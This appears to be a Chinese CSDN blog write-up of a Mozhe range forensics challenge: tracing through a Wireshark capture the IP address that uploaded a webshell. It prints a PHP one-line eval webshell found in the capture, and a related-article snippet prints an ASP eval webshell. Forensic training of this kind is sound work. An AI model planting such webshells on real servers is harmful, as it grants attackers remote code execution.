在线靶场-墨者-电子数据取证5星-网络数据分析溯源(上传WebShell的IP地址)

最新推荐文章于 2019-09-05 08:54:29 发布
最新推荐文章于 2019-09-05 08:54:29 发布
阅读量556 收藏 1
点赞数
分类专栏: 在线靶场-墨者题目 文章标签: 墨者学院-靶场题目
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42079912/article/details/98967930
版权
通过墨者学院的在线靶场挑战,分析21.pcapng文件,利用Wireshark过滤HTTP POST请求,发现uploads目录下存在2.php文件,包含一句话木马。追踪HTTP数据流后,确定112.192.189.124为上传WebShell的IP地址。
摘要由CSDN通过智能技术生成

打开靶场网页,下载文件并压缩
在这里插入图片描述
根据题意发现有人成功上传了WebShell,请找到上传者的IP地址。
使用Wireshark打开21.pcapng文件,因为是上传WebShell,所以数据走得应该是http协议,使用POST请求方式。属于在Wireshark中输入http.request.method==POST。过滤出http协议POST请求的数据出来。查看数据,找到uploads上传,一般上传文件都是在uploads目录下。
在这里插入图片描述
在这里插入图片描述
如果想让界面看起来简洁一点,对此数据右键使用Follow,追踪http数据流(HTTP stream)
在这里插入图片描述
追踪http数据流后发现,上传一个名为2.php的文件,
并且还有一句话木马<?php @eval($_POST['pgf']);?>
所以112.192.189.124就是上传WebShell的IP地址。把该IP地址输入靶场网页,即可得到key。
在这里插入图片描述

笑棋
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院 电子数据取证
zip471642048的博客
05-29 1888
文章目录电子数据取证-流量分析(第1题)网络数据分析溯源(攻击者IP) 电子数据取证-流量分析(第1题) 网络数据分析溯源(攻击者IP) 查看z1的内容,可以知道z5是执行sql的命令
网络数据分析溯源(上传WebShellIP地址)
qq_36933272的博客
09-05 623
wireshark打开下载的包 因为webshell上传了,所以需要过滤POST请求,并搜索字符串upload 追踪TCP流 发现有php一句话木马,应该是这个了,输入ip,得到key ...
【实战学习】电子数据取证专题——网络数据分析溯源(下)
mozhe_的博客
03-14 2184
网络数据分析溯源(新增用户的身份证号) 背景介绍 某公司安全工程师抓取到一段Wireshark数据包,发现有人利用WebShell操作了数据库,请找到新增的用户的身份证号。 实训目标 1、掌握“Wireshark”的基本使用方法; 2、了解数据网络中传输的过程和协议; 靶场地址:https://www.mozhe.cn/bug/detail/146 网络数据分析溯源(发布文章...
在线靶场-墨者-电子数据取证1-网络数据分析溯源(SQL注入的IP地址)
weixin_42079912的博客
07-18 318
SQL注入走的是http协议。 在wireshark工具打开下载好的文件,过滤http协议,发现会有很多的http协议,然后发现有个http协议的内容是关于sql.php的,根据内容中的SELECT参数可以得知这条数据是注入信息,把103.45.52.159(source ip)输入靶场网页即可得到key。 ...
墨者 - 网络数据分析溯源(发布文章的IP地址)
吃肉唐僧的博客
07-17 1042
下载文件,第一反应查找域名“www.xwast.org”的记录 太多了,无法精确定位 后来想起文章一般都用post提交的 http.host=="www.xwast.org" && http.request.method == POST 定位到ip ...
墨者 - 网络数据分析溯源(SQL注入的IP地址)
吃肉唐僧的博客
07-19 801
下载文件 因为sql注入肯定涉及到password字段 所以直接搜索http协议与字符“password” 一个一个试,很快找到地址为103.45.52.159
墨者学院 - WebShell文件上传分析溯源(第2题)
多崎巡礼的博客
08-01 2312
御剑扫描网址可以得到 ip/admin/upload1.php,ip/admin/upload2.php 尝试 ip/admin/upload.php,发现直接跳转upload1.php,没有访问权限继续跳转upload2.php burpsuite抓包,截取upload.php,查看源码得到 forward一下 将uploadmd5更改为 upload_file.php 发送给re...
墨者 - WebShell文件上传漏洞分析溯源(第5题)
吃肉唐僧的博客
07-16 245
进到后台,弱口令账号admin,密码admin 登录成功后,找注入点,发现添加文章可以文件上传 直接上传asp文件,会被拒绝 asp一句话木马 <%eval request("MH")%> 后来改为asp木马图片 上传成功 备份数据库 备份成功,有地址 接下来菜刀无惧链接 找到key.txt ...
wireshark数据包分析实战 读书笔记
think_ycx的专栏
03-10 1万+
由头之前读了很多书籍,但是现在回顾的时候,很多内容仅仅是熟悉,而不是真正掌握。所以尝试一种新的方式,将读书时觉得比较重要的,或者是自己还不理解的东西记录下来。达到这本书我已经不需要再去翻,只要看笔记即可的效果。
【实战学习】电子数据取证专题——网络数据分析溯源(上)
mozhe_的博客
03-04 3452
电子数据取证专题-网络数据分析溯源 新题来了!!! 网络取证网络入侵事件、网络犯罪活动进行证据获取、保存、分析和还原,它能够真实、连续地获取网络上发生的各种行为;能够完整地保存获取到的数据,并且防篡改;对保存的原始证据进行网络行为还原,重现入侵现场。 网络数据分析溯源(爆破扫描的IP地址) 背景介绍 某公司安全工程师抓取到一段Wireshark数据包,其中一IP对目标服务器做爆破扫描攻击扫...
Wireshark 认识捕获的分析数据包(及各个分层协议的介绍)
热门推荐
小白裸奔
09-12 2万+
综述:认识Wireshark捕获数据包 当我们对Wireshark主窗口各部分作用了解了,学会捕获数据了,接下来就该去认识这些捕获的数据包了。Wireshark将从网络中捕获到的二进制数据按照不同的协议包结构规范,显示在Packet Details面板中。为了帮助用户能够清楚的分析数据,本节将介绍识别数据包的方法。 在Wireshark中关于数据包的叫法有三个术语,分别是帧、包、段。下面通过分
网络数据分析溯源(WebShell密码)
qq_36933272的博客
09-05 1552
用wireshark打开数据包 有题目提示,有人连接过一句话的webshell,猜想可能是asp、php之类的木马 用http.request.method ==“POST” && http contains "php"尝试过滤,发现xiaoma.php 查看发现d76R3478就是webshell的密码 输入密码,得到key ...
在线靶场-墨者-电子数据取证4-网络数据分析溯源(数据库密码)
weixin_42079912的博客
08-09 511
打开靶场网页,下载文件并解压。 根据题目,知道发现有人操作了数据库,请找到连接数据库的密码。于是使用Wireshark打开22.pcapng文件。开始查询连接数据库的密码。 我们知道数据库常用端口号是:mysql的默认端口是3306、sqlserver默认端口号为:1433、oracle 默认端口号为:1521、DB2 默认端口号为:5000、PostgreSQL默认端口号为:5432。但是查询...
墨者 - 网络数据分析溯源(查找下载文件的内容)
吃肉唐僧的博客
07-23 971
下载文件,根据题目要求寻找解压文件 猜测是zip文件,直接字符串搜索 找到一个key.zip,想着直接看他的数据,没有出现类似传输数据的字符 后来参考了链接:https://zhuanlan.zhihu.com/p/31512066 试着追踪该包的tcp流 发现key.jpg,直接以原始数据导出来,.zip后缀 解压可获得key的图片 ...
墨者 - WebShell文件上传分析溯源(第2题)
吃肉唐僧的博客
07-16 883
用御剑扫描出后台地址 一个一个地址去访问,内容是空白的,访问upload1提示无权限而且会跳转到upload2 后来用bp抓包,再访问upload1.php 发现再跳转upload2之前有个表单页面 然后一句话木马,上传a.php文件 上传了,心中狂喜,以为成功 然后突然发现找不到上传文件的位置, 有试过直接ip/admin/upload_file.php ...
墨者 - 网络数据分析溯源(登录QQ的IP地址)
吃肉唐僧的博客
07-23 947
与大部分解题思路不同,很多writeup是基于qq的应用协议oicq直接过滤得到地址 而这个的是猜想qq登录成功后会存在get请求,而且会请求到名字带有qq字眼的文件 进行过滤,看到qqfile的字眼, 直接提交地址,获取key ...
墨者 - 网络数据分析溯源(ping服务器的IP地址)
吃肉唐僧的博客
07-20 380
题目可知,不断的ping服务器 而ping是要基于icmp作为信息的传递的 所以直接过滤icmp 找到地址203.39.8.77
墨者-sql手工注入漏洞测试
最新发布
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值